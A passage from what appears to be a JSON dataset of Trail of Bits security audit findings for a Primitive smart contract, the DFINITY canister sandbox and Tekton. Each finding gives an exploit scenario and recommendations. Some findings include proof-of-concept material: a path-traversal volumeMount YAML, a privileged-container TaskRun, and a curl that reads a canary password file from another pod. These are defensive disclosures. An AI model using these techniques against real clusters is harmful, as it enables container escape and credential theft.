\"balance recip risky\" , balanceRecipientRiskyBefore, balanceRecipientRiskyAfter, delRisky); emit DepositWithdraw( \"balance recip stable\" , balanceRecipientStableBefore, balanceRecipientStableAfter, delStable); emit DepositWithdraw( \"balance engine risky\" , balanceEngineRiskyBefore, balanceEngineRiskyAfter, delRisky); emit DepositWithdraw( \"balance engine stable\" , balanceEngineStableBefore, balanceEngineStableAfter, delStable); assert(balanceRecipientRiskyAfter == balanceRecipientRiskyBefore + delRisky); assert(balanceRecipientStableAfter == balanceRecipientStableBefore + delStable); assert(balanceEngineRiskyAfter == balanceEngineRiskyBefore - delRisky); assert(balanceEngineStableAfter == balanceEngineStableBefore - delStable); } } Figure 14.2: rmm-core/contracts/crytic/E2E_Deposit_Withdrawal.sol withdraw_with_safe_range(address,uint256,uint256): failed! Call sequence: deposit_with_safe_range(0xa329c0648769a73afac7f9381e08fb43dbea72,115792089237316195423570985 008687907853269984665640564039447584007913129639937,5964323976539599410180707317759394870432 1625682232592596462650205581096120955) from: 0x1E2F9E10D02a6b8F8f69fcBf515e75039D2EA30d withdraw_with_safe_range(0x48bacb9266a570d521063ef5dd96e61686dbe788,5248038478797710845,748) from: 0x6A4A62E5A7eD13c361b176A5F62C2eE620Ac0DF8 Event sequence: Panic(1), Transfer(5248038478797710846), Transfer(749), Withdraw(5248038478797710846, 749), DepositWithdraw(\"sender risky\", 8446744073709551632, 3198705594911840786, 5248038478797710846), DepositWithdraw(\"sender stable\", 15594018607531992466, 15594018607531991717, 749), DepositWithdraw(\"balance recip risky\", 8446744073709551632, 8446744073709551632, 5248038478797710846), DepositWithdraw(\"balance recip stable\", 15594018607531992466, 15594018607531992466, 749), DepositWithdraw(\"balance engine risky\", 8446744073709551632, 8446744073709551632, 5248038478797710846), DepositWithdraw(\"balance engine stable\", 15594018607531992466, 15594018607531992466, 749) Figure 14.3: Echidna results Exploit Scenario Alice, a user, withdraws her funds from the Primitive engine. She accidentally species the address of the recipient as the engine address, and her funds are left stuck in the contract. Recommendations Short term, add a check to ensure that users cannot withdraw to the engine address directly to ensure that users are protected from these mistakes. Long term, use Echidna to test system and mathematical invariants.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Low" + ] + }, + { + "title": "1. The canister sandbox has vulnerable dependencies ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/DFINITYCanisterSandbox.pdf", + "body": "The canister sandbox codebase uses the following vulnerable or unmaintained Rust dependencies. (All of the crates listed are indirect dependencies of the codebase.) Dependency Version ID", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "2. Complete environment of the replica is passed to the sandboxed process ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/DFINITYCanisterSandbox.pdf", + "body": "When the spawn_socketed_process function spawns a new sandboxed process, the call to the Command::spawn method passes the entire environment of the replica to the sandboxed process. pub fn spawn_socketed_process( exec_path: &str, argv: &[String], socket: RawFd, ) -> std::io::Result { let mut cmd = Command::new(exec_path); cmd.args(argv); // In case of Command we inherit the current process's environment. This should // particularly include things such as Rust backtrace flags. It might be // advisable to filter/configure that (in case there might be information in // env that the sandbox process should not be privy to). // The following block duplicates sock_sandbox fd under fd 3, errors are // handled. unsafe { cmd.pre_exec(move || { let fd = libc::dup2(socket, 3); if fd != 3 { return Err(std::io::Error::last_os_error()); } Ok(()) }) }; let child_handle = cmd.spawn()?; Ok(child_handle) } Figure 2.1: canister_sandbox/common/src/process.rs:17- The DFINITY team does not use environment variables for sensitive information. However, sharing the environment with the sandbox introduces a latent risk that system conguration data or other sensitive data could be leaked to the sandboxed process in the future. Exploit Scenario A malicious canister gains arbitrary code execution within a sandboxed process. Since the environment of the replica was leaked to the sandbox when the process was created, the canister gains information about the system that it is running on and learns sensitive information passed as environment variables to the replica, making further eorts to compromise the system easier. Recommendations Short term, add code that lters the environment passed to the sandboxed process (e.g., Command::env_clear or Command::env_remove) to ensure that no sensitive information is leaked if the sandbox is compromised.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "3. SELinux policy allows the sandbox process to write replica log messages ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/DFINITYCanisterSandbox.pdf", + "body": "When a new sandboxed process is spawned using Command::spawn, the processs stdin, stdout, and stderr le descriptors are inherited from the parent process. The SELinux policy for the canister sandbox currently allows sandboxed processes to read from and write to all le descriptors inherited from the replica (the le descriptors created by init when the replica is started, as well as the le descriptor used for interprocess RPC). As a result, a compromised sandbox could spoof log messages to the replica's stdout or stderr. # Allow to use the logging file descriptor inherited from init. # This should actually not be allowed, logs should be routed through # replica. allow ic_canister_sandbox_t init_t : fd { use }; allow ic_canister_sandbox_t init_t : unix_stream_socket { read write }; Figure 3.1: guestos/rootfs/prep/ic-node/ic-node.te:312-316 Additionally, sandboxed processes read and write access to les with the tmpfs_t context appears to be overly broad, but considering the fact that sandboxed processes are not allowed to open les, we did not see any way to exploit this. Exploit Scenario A malicious canister gains arbitrary code execution within a sandboxed process. By writing fake log messages to the replicas stderr le descriptor, the canister makes it look like the replica has other issues, masking the compromise and making incident response more dicult. Recommendations Short term, change the SELinux policy to disallow sandboxed processes from reading from and writing to the inherited le descriptors stdin, stdout, and stderr.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "4. Canister sandbox system calls are not ltered using Seccomp ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/DFINITYCanisterSandbox.pdf", + "body": "Seccomp provides a framework to lter outgoing system calls. Using Seccomp, a process can limit the type of system calls available to it, thereby limiting the available attack surface of the kernel. The current implementation of the canister sandbox does not use Seccomp; instead, it relies on mandatory access controls (via SELinux) to restrict the system calls available to a sandboxed process. While SELinux is useful for restricting access to les, directories, and other processes, Seccomp provides more ne-grained control over kernel system calls and their arguments. For this reason, Seccomp (in particular, Seccomp-BPF) is a useful complement to SELinux in restricting a sandboxed processs access to the system. Exploit Scenario A malicious canister gains arbitrary code execution within a sandboxed process. By exploiting a vulnerability in the kernel, it is able to break out of the sandbox and execute arbitrary code on the node. Recommendations Long term, consider using Seccomp-BPF to restrict the system calls available to a sandboxed process. Extra care must be taken when the canister sandbox (or any of its dependencies) is updated to ensure that the set of system calls invoked during normal execution has not changed.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: High" + ] + }, + { + "title": "5. Invalid system state changes cause the replica to panic ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/DFINITYCanisterSandbox.pdf", + "body": "When a sandboxed process has completed an execution request, the hypervisor calls SystemStateChanges::apply_changes (in Hypervisor::execute) to apply the system state changes to the global canister system state. pub fn apply_changes(self, system_state: &mut SystemState) { // Verify total cycle change is not positive and update cycles balance. assert!(self.cycle_change_is_valid( system_state.canister_id == CYCLES_MINTING_CANISTER_ID )); self.cycles_balance_change .apply_ref(system_state.balance_mut()); // Observe consumed cycles. system_state .canister_metrics .consumed_cycles_since_replica_started += NominalCycles::from_cycles(self.cycles_consumed); // Verify we don't accept more cycles than are available from each call // context and update each call context balance if !self.call_context_balance_taken.is_empty() { let call_context_manager = system_state.call_context_manager_mut().unwrap(); for (context_id, amount_taken) in &self.call_context_balance_taken { let call_context = call_context_manager .call_context_mut(*context_id) .expect(\"Canister accepted cycles from invalid call context\"); call_context .withdraw_cycles(*amount_taken) .expect(\"Canister accepted more cycles than available ...\"); } } // Push outgoing messages. for msg in self.requests { system_state .push_output_request(msg) .expect(\"Unable to send new request\"); } // Verify new certified data isn't too long and set it. if let Some(certified_data) = self.new_certified_data.as_ref() { assert!(certified_data.len() <= CERTIFIED_DATA_MAX_LENGTH as usize); system_state.certified_data = certified_data.clone(); } // Verify callback ids and register new callbacks. for update in self.callback_updates { match update { CallbackUpdate::Register(expected_id, callback) => { let id = system_state .call_context_manager_mut() .unwrap() .register_callback(callback); assert_eq!(id, expected_id); } CallbackUpdate::Unregister(callback_id) => { let _callback = system_state .call_context_manager_mut() .unwrap() .unregister_callback(callback_id) .expect(\"Tried to unregister callback with an id ...\"); } } } } Figure 5.1: system_api/src/sandbox_safe_system_state.rs:99-157 The apply_changes method uses assert and expect to ensure that system state invariants involving cycle balances, call contexts, and callback updates are upheld. By sending a WebAssembly (Wasm) execution output with invalid system state changes, a compromised sandboxed process could use this to cause the replica to panic. Exploit Scenario A malicious canister gains arbitrary code execution within a sandboxed process. The canister sends a Wasm execution output message containing invalid state changes to the replica, which causes the replica process to panic, crashing the entire subnet. Recommendations Short term, revise SystemStateChanges::apply_changes so that it returns an error if the system state changes from a sandboxed process are found to be invalid. Long term, audit the codebase for the use of panicking functions and macros like assert, unreachable, unwrap, or expect in code that validates data from untrusted sources.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: High" + ] + }, + { + "title": "6. SandboxedExecutionController does not enforce memory size invariants ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/DFINITYCanisterSandbox.pdf", + "body": "When a sandboxed process has completed an execution request, the execution state is updated by the SandboxedExecutionController::process method with the data from the execution output. // Unless execution trapped, commit state (applying execution state // changes, returning system state changes to caller). let system_state_changes = if exec_output.wasm.wasm_result.is_ok() { if let Some(state_modifications) = exec_output.state { // TODO: If a canister has broken out of wasm then it might have allocated // more wasm or stable memory than allowed. We should add an additional // check here that the canister is still within its allowed memory usage. execution_state .wasm_memory .page_map .deserialize_delta(state_modifications.wasm_memory.page_delta); execution_state.wasm_memory.size = state_modifications.wasm_memory.size; execution_state.wasm_memory.sandbox_memory = SandboxMemory::synced( wrap_remote_memory(&sandbox_process, next_wasm_memory_id), ); execution_state .stable_memory .page_map .deserialize_delta(state_modifications.stable_memory.page_delta); execution_state.stable_memory.size = state_modifications.stable_memory.size; execution_state.stable_memory.sandbox_memory = SandboxMemory::synced( wrap_remote_memory(&sandbox_process, next_stable_memory_id), ); // ... state_modifications.system_state_changes } else { SystemStateChanges::default() } } else { SystemStateChanges::default() }; Figure 6.1: replica_controller/src/sandboxed_execution_controller.rs:663 However, the code does not validate the Wasm and stable memory sizes against the corresponding page maps. This means that a compromised sandbox could report a Wasm or stable memory size of 0 along with a non-empty page map. Since these memory sizes are used to calculate the total memory used by the canister in ExecutionState::memory_usage, this lack of validation could allow the canister to use up cycles normally reserved for memory use. pub fn memory_usage(&self) -> NumBytes { // We use 8 bytes per global. let globals_size_bytes = 8 * self.exported_globals.len() as u64; let wasm_binary_size_bytes = self.wasm_binary.binary.len() as u64; num_bytes_try_from(self.wasm_memory.size) .expect(\"could not convert from wasm memory number of pages to bytes\") + num_bytes_try_from(self.stable_memory.size) .expect(\"could not convert from stable memory number of pages to bytes\") + NumBytes::from(globals_size_bytes) + NumBytes::from(wasm_binary_size_bytes) } Figure 6.2: replicated_state/src/canister_state/execution_state.rs:411421 Canister memory usage aects how much the cycles account manager charges the canister for resource allocation. If the canister uses best-eort memory allocation, the implementation calls through to ExecutionState::memory_usage to compute how much memory the canister is using. pub fn charge_canister_for_resource_allocation_and_usage( &self, log: &ReplicaLogger, canister: &mut CanisterState, duration_between_blocks: Duration, ) -> Result<(), CanisterOutOfCyclesError> { let bytes_to_charge = match canister.memory_allocation() { // The canister has explicitly asked for a memory allocation. MemoryAllocation::Reserved(bytes) => bytes, // The canister uses best-effort memory allocation. MemoryAllocation::BestEffort => canister.memory_usage(self.own_subnet_type), }; if let Err(err) = self.charge_for_memory( &mut canister.system_state, bytes_to_charge, duration_between_blocks, ) { } // ... // ... } Figure 6.3: cycles_account_manager/src/lib.rs:671 Thus, if a sandboxed process reports a lower memory usage, the cycles account manager will charge the canister less than it should. It is unclear whether this represents expected behavior when a canister breaks out of the Wasm execution environment. Clearly, if the canister is able to execute arbitrary code in the context of a sandboxed process, then the replica has lost all ability to meter and restrict canister execution, which means that accounting for canister cycle and memory use is largely meaningless. Exploit Scenario A malicious canister gains arbitrary code execution within a sandboxed process. The canister reports the wrong memory sizes back to the replica with the execution output. This causes the cycles account manager to miscalculate the remaining available cycles for the canister in the charge_canister_for_resource_allocation_and_usage method. Recommendations Short term, document this behavior and ensure that implicitly trusting the canister output could not adversely aect the replica or other canisters running on the system. Consider enforcing the correct invariants for memory allocations reported by a sandboxed process. The following invariant should always hold for Wasm and stable memory: page_map_size <= memory.size <= MAX_SIZE page_map_size could be computed as memory.page_map.num_host_pages() * PAGE_SIZE.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "1. The use of time.After() in select statements can lead to memory leaks ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", + "body": "Calls to time.After in for/select statements can lead to memory leaks because the garbage collector does not clean up the underlying Timer object until the timer res. A new timer, which requires resources, is initialized at each iteration of the for loop (and, hence, the select statement). As a result, many routines originating from the time.After call could lead to overconsumption of the memory. for { select { case <-ctx.Done(): // When the context is cancelled, stop reporting. return case <-time.After(r.ReportingPeriod): // Every 30s surface a metric for the number of running pipelines. if err := r.RunningPipelineRuns(lister); err != nil { logger.Warnf(\"Failed to log the metrics : %v\", err) } Figure 1.1: tektoncd/pipeline/pkg/pipelinerunmetrics/metrics.go#L290-L300 for { select { case <-ctx.Done(): // When the context is cancelled, stop reporting. return case <-time.After(r.ReportingPeriod): // Every 30s surface a metric for the number of running tasks. if err := r.RunningTaskRuns(lister); err != nil { logger.Warnf(\"Failed to log the metrics : %v\", err) } } Figure 1.2: pipeline/pkg/taskrunmetrics/metrics.go#L380-L391 Exploit Scenario An attacker nds a way to overuse a function, which leads to overconsumption of the memory and causes Tekton Pipelines to crash. Recommendations Short term, consider refactoring the code that uses the time.After function in for/select loops using tickers. This will prevent memory leaks and crashes caused by memory exhaustion. Long term, ensure that the time.After method is not used in for/select routines. Periodically use the Semgrep query to check for and detect similar patterns. References Use with caution time.After Can cause memory leak (golang) Golang <-time.After() is not garbage collected before expiry", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "2. Risk of resource exhaustion due to the use of defer inside a loop ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", + "body": "The ExecuteInterceptors function runs all interceptors congured for a given trigger inside a loop. The res.Body.Close() function is deferred at the end of the loop. Calling defer inside of a loop could cause resource exhaustion conditions because the deferred function is called when the function exits, not at the end of each loop. As a result, resources from each interceptor object are accumulated until the end of the for statement. While this may not cause noticeable issues in the current state of the application, it is best to call res.Body.Close() at the end of each loop to prevent unforeseen issues. func (r Sink) ExecuteInterceptors(trInt []*triggersv1.TriggerInterceptor, in *http.Request, event []byte, log *zap.SugaredLogger, eventID string, triggerID string, namespace string, extensions map[string]interface{}) ([]byte, http.Header, *triggersv1.InterceptorResponse, error) { if len(trInt) == 0 { return event, in.Header, nil, nil } // (...) for _, i := range trInt { if i.Webhook != nil { // Old style interceptor // (...) defer res.Body.Close() Figure 2.1: triggers/pkg/sink/sink.go#L428-L469 Recommendations Short term, rather than deferring the call to res.Body.Close(), add a call to res.Body.Close() at the end of the loop.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "3. Lack of access controls for Tekton Pipelines API ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", + "body": "The Tekton Pipelines extension uses an API to process requests for various tasks such as listing namespaces and creating TaskRuns. While Tekton provides documentation on enabling OAuth2 authentication, the API is unauthenticated by default. Should a Tekton operator expose the dashboard for other users to monitor their own deployments, every API method would be available to them, allowing them to perform tasks on namespaces that they do not have access to. Figure 3.1: Successful unauthenticated request Exploit Scenario An attacker discovers the endpoint exposing the Tekton Pipelines API and uses it to perform destructive tasks such as deleting PipelineRuns. Furthermore, the attacker can discover potentially sensitive information pertaining to deployments congured in Tekton. Recommendations Short term, add documentation on securing access to the API using Kubernetes security controls, including explicit documentation on the security implications of exposing access to the dashboard and, therefore, the API. Long term, add an access control mechanism for controlling who can access the API and limiting access to namespaces as needed and/or possible. 4. Insu\u0000cient validation of volumeMounts paths Severity: Informational Diculty: Low Type: Data Validation Finding ID: TOB-TKN-4 Target: Various", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Medium" + ] + }, + { + "title": "5. Missing validation of Origin header in WebSocket upgrade requests ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", + "body": "Tekton Dashboard uses the WebSocket protocol to provide real-time updates for TaskRuns, PipelineRuns, and other Tekton data. The endpoints responsible for upgrading the incoming HTTP request to a WebSocket request do not validate the Origin header to ensure that the request is coming from a trusted origin (i.e., the dashboard itself). As a result, arbitrary malicious web pages can connect to Tekton Dashboard and receive these real-time updates, which may include sensitive information, such as the log output of TaskRuns and PipelineRuns. Exploit Scenario A user hosts Tekton Dashboard on a private address, such as one in a local area network or a virtual private network (VPN), without enabling application-layer authentication. An attacker identies the URL of the dashboard instance (e.g., http://192.168.3.130:9097) and hosts a web page with the following content: Figure 5.1: A malicious web page that extracts Tekton Dashboard WebSocket updates The attacker convinces the user to visit the web page. Upon loading it, the users browser successfully connects to the Tekton Dashboard WebSocket endpoint for monitoring PipelineRuns and logs received messages to the JavaScript console. As a result, the attackers untrusted web origin now has access to real-time updates from a dashboard instance on a private network that would otherwise be inaccessible outside of that network. Figure 5.2: The untrusted origin http://localhost:8080 has access to Tekton Dashboard WebSocket messages. Recommendations Short term, modify the code so that it veries that the Origin header of WebSocket upgrade requests corresponds to the trusted origin on which Tekton Dashboard is served. For example, if the origin is not http://192.168.3.130:9097, Tekton Dashboard should reject the incoming request. 6. Import resources feature does not validate repository URL scheme Severity: Informational Diculty: Low Type: Data Validation Finding ID: TOB-TKN-6 Target: Dashboard", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Medium" + ] + }, + { + "title": "8. Tekton allows users to create privileged containers ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", + "body": "Tekton allows users to dene task and sidecar objects with a privileged security context, which eectively grants task containers all capabilities. Tekton operators can use admission controllers to disallow users from using this option. However, information on this mitigation in the guidance documents for Tekton Pipelines is insucient and should be made clear. If an attacker gains code execution on any of these containers, the attacker could break out of it and gain full access to the host machine. We were not able to escape step containers running in privileged mode during the time allotted for this audit. apiVersion: tekton.dev/v1beta1 kind: TaskRun metadata: name: build-push-secret-10 spec: serviceAccountName: build-bot taskSpec: steps: - name: secret securityContext: privileged: true image: ubuntu script: | #!/usr/bin/env bash sleep 20m Figure 8.1: TaskRun denition with the privileged security context root@build-push-secret-10-pod:/proc/fs# find -type f -maxdepth 5 -writable find: warning: you have specified the global option -maxdepth after the argument -type, but global options are not positional, i.e., -maxdepth affects tests specified before it as well as those specified after it. Please specify global options before other arguments. ./xfs/xqm ./xfs/xqmstat ./cifs/Stats ./cifs/cifsFYI ./cifs/dfscache ./cifs/traceSMB ./cifs/DebugData ./cifs/open_files ./cifs/SecurityFlags ./cifs/LookupCacheEnabled ./cifs/LinuxExtensionsEnabled ./ext4/vda1/fc_info ./ext4/vda1/options ./ext4/vda1/mb_groups ./ext4/vda1/es_shrinker_info ./jbd2/vda1-8/info ./fscache/stats Figure 8.2: With the privileged security context in gure 8.1, it is now possible to write to several les in /proc/fs, for example. Exploit Scenario A malicious developer runs a TaskRun with a privileged security context and obtains shell access to the container. Using one of various known exploits, he breaks out of the container and gains root access on the host. Recommendations Short term, create clear, easy-to-locate documentation warning operators about allowing developers and other users to dene a privileged security context for step containers, and include guidance on how to restrict such a feature. 9. Insu\u0000cient default network access controls between pods Severity: Medium Diculty: High Type: Conguration Finding ID: TOB-TKN-9 Target: Pipelines", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Medium" + ] + }, + { + "title": "11. Lack of rate-limiting controls ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", + "body": "Tekton Dashboard does not enforce rate limiting of HTTP requests. As a result, we were able to issue over a thousand requests in just over a minute. Figure 11.1: We sent over a thousand requests to Tekton Dashboard without being rate limited. Processing requests sent at such a high rate can consume an inordinate amount of resources, increasing the risk of denial-of-service attacks through excessive resource consumption. In particular, we were able to create hundreds of running import resources pods that were able to consume nearly all the hosts memory in the span of a minute. Exploit Scenario An attacker oods a Tekton Dashboard instance with HTTP requests that execute pipelines, leading to a denial-of-service condition. Recommendations Short term, implement rate limiting on all API endpoints. Long term, run stress tests to ensure that the rate limiting enforced by Tekton Dashboard is robust.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: Medium" + ] + }, + { + "title": "12. Lack of maximum request and response body constraint ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", + "body": "The ioutil.ReadAll function reads from source until an error or an end-of-le (EOF) condition occurs, at which point it returns the data that it read. This function is used in dierent les of the Tekton Triggers and Tekton Pipelines codebases to read requests and responses. There is no limit on the maximum size of request and response bodies, so using ioutil.ReadAll to parse requests and responses could cause a denial of service (due to insucient memory). A denial of service could also occur if an exhaustive resource is loaded multiple times. This method is used in the following locations of the codebase: File pkg/remote/oci/resolver.go:L211 pkg/sink/sink.go:147,465 Project Pipelines Triggers pkg/interceptors/webhook/webhook.go:77 Triggers pkg/interceptors/interceptors.go:176 Triggers pkg/sink/validate_payload.go:29 cmd/binding-eval/cmd/root.go:141 cmd/triggerrun/cmd/root.go:182 Triggers Triggers Triggers Recommendations Short term, place a limit on the maximum size of request and response bodies. For example, this limit can be implemented by using the io.LimitReader function. Long term, place limits on request and response bodies globally in other places within the application to prevent denial-of-service attacks.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: High" + ] + }, + { + "title": "3. Lack of access controls for Tekton Pipelines API ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", + "body": "The Tekton Pipelines extension uses an API to process requests for various tasks such as listing namespaces and creating TaskRuns. While Tekton provides documentation on enabling OAuth2 authentication, the API is unauthenticated by default. Should a Tekton operator expose the dashboard for other users to monitor their own deployments, every API method would be available to them, allowing them to perform tasks on namespaces that they do not have access to. Figure 3.1: Successful unauthenticated request Exploit Scenario An attacker discovers the endpoint exposing the Tekton Pipelines API and uses it to perform destructive tasks such as deleting PipelineRuns. Furthermore, the attacker can discover potentially sensitive information pertaining to deployments congured in Tekton. Recommendations Short term, add documentation on securing access to the API using Kubernetes security controls, including explicit documentation on the security implications of exposing access to the dashboard and, therefore, the API. Long term, add an access control mechanism for controlling who can access the API and limiting access to namespaces as needed and/or possible.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Medium" + ] + }, + { + "title": "4. Insu\u0000cient validation of volumeMounts paths ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", + "body": "The Tekton Pipelines extension performs a number of validations against task steps whenever a task is submitted for Tekton to process. One such validation veries that the path for a volume mount is not inside the /tekton directory. This directory is treated as a special directory by Tekton, as it is used for Tekton-specic functionality. However, the extension uses strings.HasPrefix to verify that MountPath does not contain the string /tekton/ without rst sanitizing it. As a result, it is possible to create volume mounts inside /tekton by using path traversal strings such as /somedir/../tekton/newdir in the volumeMounts variable of a task step denition. for j, vm := range s.VolumeMounts { if strings.HasPrefix(vm.MountPath, \"/tekton/\") && !strings.HasPrefix(vm.MountPath, \"/tekton/home\") { errs = errs.Also(apis.ErrGeneric(fmt.Sprintf(\"volumeMount cannot be mounted under /tekton/ (volumeMount %q mounted at %q)\", vm.Name, vm.MountPath), \"mountPath\").ViaFieldIndex(\"volumeMounts\", j)) } if strings.HasPrefix(vm.Name, \"tekton-internal-\") { errs = errs.Also(apis.ErrGeneric(fmt.Sprintf(`volumeMount name %q cannot start with \"tekton-internal-\"`, vm.Name), \"name\").ViaFieldIndex(\"volumeMounts\", j)) } } Figure 4.1: pipeline/pkg/apis/pipeline/v1beta1/task_validation.go#L218-L226 The YAML le in the gure below was used to create a volume in the reserved /tekton directory. apiVersion: tekton.dev/v1beta1 kind: TaskRun metadata: name: vol-test spec: taskSpec: steps: - image: docker name: client workingDir: /workspace script: | #!/usr/bin/env sh sleep 15m volumeMounts: - mountPath: /certs/client/../../../tekton/mytest name: empty-path volumes: - name: empty-path emptyDir: {} Figure 4.2: Task run le used to create a volume mount inside an invalid location The gure below demonstrates that the previous le successfully created the mytest directory inside of the /tekton directory by using a path traversal string. $ kubectl exec -i -t vol-test -- /bin/sh Defaulted container \"step-client\" out of: step-client, place-tools (init), step-init (init), place-scripts (init) /workspace # cd /tekton/ /tekton # ls bin creds downward home scripts steps termination results run mytest Figure 4.3: Logging into the task pod container, we can now list the mytest directory inside of /tekton. Recommendations Short term, modify the code so that it converts the mountPath string into a le path and uses a function such as filepath.Clean to sanitize and canonicalize it before validating it.", + "labels": [ + "Trail of Bits", + "Severity: Informational", + "Difficulty: Low" + ] + }, + { + "title": "7. Insu\u0000cient security hardening of step containers ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", + "body": "Containers used for running task and pipeline steps have excessive security context options enabled. This increases the attack surface of the system, and issues such as Linux kernel bugs may allow attackers to escape a container if they gain code execution within a Tekton container. The gure below shows the security properties of a task container with the docker driver. 0 0 0 0 0 0 cat 0 0 # cat /proc/self/status | egrep 'Name|Uid|Gid|Groups|Cap|NoNewPrivs|Seccomp' Name: Uid: Gid: Groups: CapInh: 00000000a80425fb CapPrm: 00000000a80425fb CapEff: 00000000a80425fb CapBnd: 00000000a80425fb CapAmb: 0000000000000000 NoNewPrivs: 0 0 Seccomp: Seccomp_filters: 0 Figure 7.1: The security properties of one of the step containers Exploit Scenario Eve nds a bug that allows her to run arbitrary code on behalf of a conned process within a container, using it to gain more privileges in the container and then to attack the host. Recommendations Short term, drop default capabilities from containers and prevent processes from gaining additional privileges by setting the --cap-drop=ALL and --security-opt=no-new-privileges:true ags when starting containers. Long term, review and implement the Kubernetes security recommendations in appendix C.", + "labels": [ + "Trail of Bits", + "Severity: Low", + "Difficulty: High" + ] + }, + { + "title": "8. Tekton allows users to create privileged containers ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", + "body": "Tekton allows users to dene task and sidecar objects with a privileged security context, which eectively grants task containers all capabilities. Tekton operators can use admission controllers to disallow users from using this option. However, information on this mitigation in the guidance documents for Tekton Pipelines is insucient and should be made clear. If an attacker gains code execution on any of these containers, the attacker could break out of it and gain full access to the host machine. We were not able to escape step containers running in privileged mode during the time allotted for this audit. apiVersion: tekton.dev/v1beta1 kind: TaskRun metadata: name: build-push-secret-10 spec: serviceAccountName: build-bot taskSpec: steps: - name: secret securityContext: privileged: true image: ubuntu script: | #!/usr/bin/env bash sleep 20m Figure 8.1: TaskRun denition with the privileged security context root@build-push-secret-10-pod:/proc/fs# find -type f -maxdepth 5 -writable find: warning: you have specified the global option -maxdepth after the argument -type, but global options are not positional, i.e., -maxdepth affects tests specified before it as well as those specified after it. Please specify global options before other arguments. ./xfs/xqm ./xfs/xqmstat ./cifs/Stats ./cifs/cifsFYI ./cifs/dfscache ./cifs/traceSMB ./cifs/DebugData ./cifs/open_files ./cifs/SecurityFlags ./cifs/LookupCacheEnabled ./cifs/LinuxExtensionsEnabled ./ext4/vda1/fc_info ./ext4/vda1/options ./ext4/vda1/mb_groups ./ext4/vda1/es_shrinker_info ./jbd2/vda1-8/info ./fscache/stats Figure 8.2: With the privileged security context in gure 8.1, it is now possible to write to several les in /proc/fs, for example. Exploit Scenario A malicious developer runs a TaskRun with a privileged security context and obtains shell access to the container. Using one of various known exploits, he breaks out of the container and gains root access on the host. Recommendations Short term, create clear, easy-to-locate documentation warning operators about allowing developers and other users to dene a privileged security context for step containers, and include guidance on how to restrict such a feature.", + "labels": [ + "Trail of Bits", + "Severity: Medium", + "Difficulty: Medium" + ] + }, + { + "title": "9. Insu\u0000cient default network access controls between pods ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Tekton.pdf", + "body": "By default, containers deployed as part of task steps do not have any egress or ingress network restrictions. As a result, containers could reach services exposed over the network from any task step container. For instance, in gure 9.2, a user logs into a container running a task step in the developer-group namespace and successfully makes a request to a service in a step container in the qa-group namespace. root@build-push-secret-35-pod:/# ifconfig eth0: flags=4163 mtu 1500 inet 172.17.0.17 netmask 255.255.0.0 broadcast 172.17.255.255 ether 02:42:ac:11:00:11 txqueuelen 0 (Ethernet) RX packets 21831 bytes 32563599 (32.5 MB) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 6465 bytes 362926 (362.9 KB) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 lo: flags=73 mtu 65536 inet 127.0.0.1 netmask 255.0.0.0 loop txqueuelen 1000 (Local Loopback) RX packets 0 bytes 0 (0.0 B) RX errors 0 dropped 0 overruns 0 frame 0 TX packets 0 bytes 0 (0.0 B) TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 root@build-push-secret-35-pod:/# python -m SimpleHTTPServer Serving HTTP on 0.0.0.0 port 8000 ... 172.17.0.16 - - [08/Mar/2022 01:03:50] \"GET /tekton/creds-secrets/basic-user-pass-canary/password HTTP/1.1\" 200 - 172.17.0.16 - - [08/Mar/2022 01:04:05] \"GET /tekton/creds-secrets/basic-user-pass-canary/password HTTP/1.1\" 200 - Figure 9.1: Exposing a simple server in a step container in the developer-group namespace root@build-push-secret-35-pod:/# curl 172.17.0.17:8000/tekton/creds-secrets/basic-user-pass-canary/password mySUPERsecretPassword Figure 9.2: Reaching the service exposed in gure 9.1 from another container in the qa-group namespace Exploit Scenario An attacker launches a malicious task container that reaches a service exposed via a sidecar container and performs unauthorized actions against the service. Recommendations Short term, enforce ingress and egress restrictions to allow only resources that need to speak to each other to do so. Leverage allowlists instead of denylists to ensure that only expected components can establish these connections. Long term, ensure the use of appropriate methods of isolation to prevent lateral movement. 10. Import 